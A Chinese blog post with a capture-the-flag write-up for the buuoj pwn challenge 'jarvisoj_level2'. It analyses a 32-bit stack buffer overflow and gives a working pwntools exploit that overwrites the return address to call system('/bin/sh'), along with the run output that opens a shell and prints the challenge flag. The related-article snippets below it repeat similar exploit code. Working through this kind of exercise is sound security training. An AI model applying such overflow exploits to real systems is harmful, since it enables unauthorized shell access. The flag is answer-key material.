CTF buuoj pwn-----第9题:jarvisoj_level2

最新推荐文章于 2024-04-14 22:50:08 发布
最新推荐文章于 2024-04-14 22:50:08 发布
阅读量900 收藏 4
点赞数 1
分类专栏: PWN 文章标签: pwn linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bing_Max/article/details/120512595
版权

CTF buuoj pwn-----第9题:jarvisoj_level2

前言

梳理记录一下这道题的解题过程.
在这里插入图片描述

1. checksec

bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2
[*] '/home/bing/pwn/jarvisoj_level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

2. 解题分析

  • main函数的第一条语句就是敏感函数
    在这里插入图片描述
    在这里插入图片描述
  • 敏感函数的buf只有136个大小,显然存在栈溢出.
  • 函数自身直接调用了system函数, 我们试着找下bin/sh
  • shift+f12, 果然有bin/sh
    在这里插入图片描述
  • 双击bin/sh 找到具体地址: binsh_addr = 0804A024
    在这里插入图片描述
  • 构造payload:
    payload = b’a’*(136+4)+ p32(system_addr)+p32(main_addr)+p32(binsh_addr)

3. 编写EXP

from pwn import *

context.log_level='debug'

sh = remote('node4.buuoj.cn', 27139)  
elf = ELF('./jarvisoj_level2')  

system_addr = elf.plt['system']
binsh_addr = 0x0804a024
main_addr = elf.sym['main']
# print(hex(main_addr))

payload = b'a'*140 + p32(system_addr)+p32(main_addr)+p32(binsh_addr)

sh.sendline(payload)
sh.interactive()

4. 运行EXP, 获取flag

bing@bing-virtual-machine:~/pwn$ python3 level2.py 
[+] Opening connection to node4.buuoj.cn on port 27139: Done
[*] '/home/bing/pwn/jarvisoj_level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
0x8048480
[DEBUG] Sent 0x9d bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    00000080  61 61 61 61  61 61 61 61  61 61 61 61  20 83 04 08  │aaaa│aaaa│aaaa│ ···│
    00000090  80 84 04 08  24 a0 04 08  80 84 04 08  0a           │····│$···│····│·│
    0000009d
[*] Switching to interactive mode
[DEBUG] Received 0x7 bytes:
    b'Input:\n'
Input:
$ cat flag
[DEBUG] Sent 0x9 bytes:
    b'cat flag\n'
[DEBUG] Received 0x2b bytes:
    b'flag{f00f79fd-9a06-402c-b0e8-ad00ad7eaa88}\n'
flag{f00f79fd-9a06-402c-b0e8-ad00ad7eaa88}
Hex_bing
关注
专栏目录
ctfctf-pwn收集
03-31
ctfCTF(夺旗赛)库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF库通常由多个类别的挑战组成,例如Web安全、二...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
[BUUCTF-pwn]——jarvisoj_level2
Y_peak的博客
02-10 926
[BUUCTF-pwn]——jarvisoj_level2 目地址:https://buuoj.cn/challenges#jarvisoj_level2 checksec 一下下, 32程序 IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下 exploit from pwn import * p = remote("node3.buuoj.cn",28375) binsh = 0
[BUUCTF]PWN16——jarvisoj_level2
mcmuyanga的博客
09-01 2350
[BUUCTF]PWN16——jarvisoj_level2 附件 步骤 例行检查,32位,开启了nx保护 试运行一下程序 32位ida载入,shift+f12查看一下程序里的字符串,发现了system函数和 /bin/sh 字符串 双击跟进,ctrl+x本想查看调用该字符串的函数的,没有找到,但是程序里有这些字符串的位置, shell_addr=0x804a024 system_addr=0x8048320 我们可以直接利用这些构造 system(/bin/sh)去执行 跟进试运行时候看到的字
[buuctf]jarvisoj_level2
逆向萌新的博客
06-19 520
[buuctf]jarvisoj_level2
BUUCTF - PWNjarvisoj_level2
古月浪子的博客
04-05 686
checksec一下,栈溢出 IDA打开看看,很容易找到溢出点,/bin/sh字符串程序里也有现成的 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) ru=lamb...
BUUCTF jarvisoj_level2
、moddemod
06-12 549
exp from pwn import * context(log_level = 'debug') proc_name = './level2' p = process(proc_name) # p = remote('node3.buuoj.cn', 26643) elf = ELF(proc_name) system_addr = elf.sym['system'] main_addr = elf.sym['main'] bin_sh_str = 0x0804a024 payload = 'a'..
jarvisoj_level2【BUUCTF
qq_41696518的博客
08-26 767
jarvisoj_level2【BUUCTF
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
2020-HackIM_ctf_hackim-ctfwriteup_
09-28
这是hackim-ctf的writeup
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
BUUCTF-Pwn-jarvisoj_level2
餐桌上的猫
02-15 2353
目截图 检查文件信息,开启了NX 用IDA打开查看字符串,存在/bin/sh,检查交叉引用发现并没有被使用 查看函数表存在system函数 进入主函数反汇编查看 进入函数vulnerable_function()查看,发现存在栈溢出漏洞,就可以利用现有system函数和/bin/sh字符串getshell exp from pwn import* r=remote('node4.buuoj.cn',28083) str_bin_sh=0x804a024 call_system=0x8048
buuctfjarvisoj_level2
weixin_54452942的博客
04-11 622
buuctf--pwn
buuctf jarvisoj_level2
carol2358的博客
04-19 298
可以在ida里找到system和/bin/sh(alt+t) 然后构造payload就完事了 from pwn import * from LibcSearcher import * context(log_level = 'debug',arch ='i386',os = 'linux' ) r = remote('node3.buuoj.cn', 28847) #r = proc...
[BUUCTF] jarvisoj_level2
最新发布
Lucien_Carr的博客
04-14 454
读取文件指从某一个已打开地文件中,读取一定数量的字符,然后将这些读取的字符放入某一个预存的缓冲区内,供以后使用。有危险函数read,而且调用了system函数(但是缺少了“/bin/sh”参数)handle: 一个已经打开的文件句柄,表示从这个文件句柄所代表的文件读取数据。buffer: 指缓冲区,即读取的数据会被放到这个缓冲区中去。n: 表示调用一次read操作,应该读多少数量的字符。按“shift”+“F12”查看字符串,结果如下。进入文本视图查看system函数地址,如下图。
[BUUCTF]PWN------jarvisoj_level2
BangSen1的博客
01-20 337
jarvisoj_level2 例行检查,32bit,开启NX保护。 nc 一下 ,Hello world,没什么信息 用32位IDA打开,看到了/bin/sh,跟进一下。 想查看调用函数的,但是看不了,所幸地址已经给出,所以shell_addr=0x804A024 system_addr=0x8048320 直接利用这些构造 system(/bin/sh)去执行 找到输入点 buf的大小是0x88,读入的数据大小是0x100,多余空间足以构造rop exp flag ...
jarvisoj_level2
zip471642048的博客
06-22 172
32位没有canary 基本上就上栈溢出的简单 exp
ctf杂项:easy-nbt
资源摘要信息:"CTF杂项:easy-nbt" 知识点: 1. CTF(Capture The Flag)介绍 CTF是一种信息安全竞赛,通常包括多种类型的问和挑战,目的是考验参赛者的各种技能,如逆向工程、密码学、二进制分析、Web安全、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值